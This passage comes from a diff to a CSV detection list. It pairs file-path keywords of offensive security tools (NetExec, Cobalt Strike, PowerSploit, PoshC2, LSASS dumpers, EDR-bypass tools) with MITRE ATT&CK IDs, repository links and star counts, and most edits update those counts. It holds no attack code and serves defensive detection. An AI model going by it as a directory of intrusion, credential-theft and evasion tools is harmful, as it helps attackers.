authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","8","1","32","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" -"*\NtoskrnlOffsets.csv*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*\NtRemoteLoad.sln*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" -"*\NtRights\*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*\ntlmv1.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\NtoskrnlOffsets.csv*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*\NtRemoteLoad.sln*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*\NtRights\*","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" "*\Nuages_Cli*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" -"*\obfy-1.0.zip*","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027 - T1064 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","6","537","122","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z" -"*\OffensiveCSharp\*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*\nxc.exe*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\nxc\parsers\ip.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\nxc\parsers\nmap.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\obfy-1.0.zip*","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027 - T1064 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","6","537","123","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z" +"*\OffensiveCSharp\*","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\out_pe.exe*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","0","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*\padre\pkg\exploit*","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","2","178","19","2023-09-25T19:11:44Z","2019-12-30T13:52:03Z" "*\papacat.ps1*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" "*\papacat.zip*","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","260","25","2023-03-30T06:22:24Z","2021-05-11T06:26:10Z" "*\ParsedMalleableData.txt*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" -"*\password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*\Passwordfiles.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*\PatchingAPI.cpp*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","259","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" -"*\PatchingAPI.exe*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","259","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" -"*\payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" -"*\PEASS-ng*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13375","2820","2023-10-02T22:12:50Z","2019-01-13T19:58:24Z" +"*\parsers\nessus.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*\password.lst*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*\Passwordfiles.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*\PatchingAPI.cpp*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*\PatchingAPI.exe*","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","N/A","9","3","260","43","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" +"*\payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*\PEASS-ng*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" "*\PerfExec.exe*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" -"*\Persistence.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" -"*\Persistence.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","48","6","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\Persistence.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\Persistence.exe*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*\petitpotam.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*\pipe\brutepipe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\PipeViewer.exe*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*\PipeViewer.sln*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" @@ -6295,16 +6415,16 @@ "*\POC_DLL.vcxproj*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","0","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*\polenum.py*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*\portbender.*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","0","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" -"*\PoshC2*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*\PoshC2*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*\PostDump.exe*","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection.","T1003.001 - T1055 - T1564.001","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","2","172","21","2023-09-15T11:24:50Z","2023-09-13T11:28:51Z" -"*\powerfun.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*\powerfun.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*\powerglot\*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"*\Powermad*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","10","1021","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" +"*\Powermad*","offensive_tool_keyword","Powermad","PowerShell MachineAccountQuota and DNS exploit tools","T1087 - T1098 - T1018 - T1046 - T1081","TA0007 - TA0006 - TA0005 - TA0001","N/A","N/A","POST Exploitation tools","https://github.com/Kevin-Robertson/Powermad","1","0","N/A","N/A","10","1022","171","2023-01-11T00:48:35Z","2017-09-05T18:34:03Z" "*\power-pwn\*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","0","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" -"*\PowershellKerberos*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","262","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" -"*\powerup.exe*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\PowershellKerberos*","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","263","37","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" +"*\powerup.exe*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\Powerup.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" -"*\PowerUp.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*\PowerUp.ps1*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*\PowerView.cna*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*\PowerView.exe*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","0","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*\Powerview.exe*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" @@ -6312,70 +6432,78 @@ "*\PowerView3.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 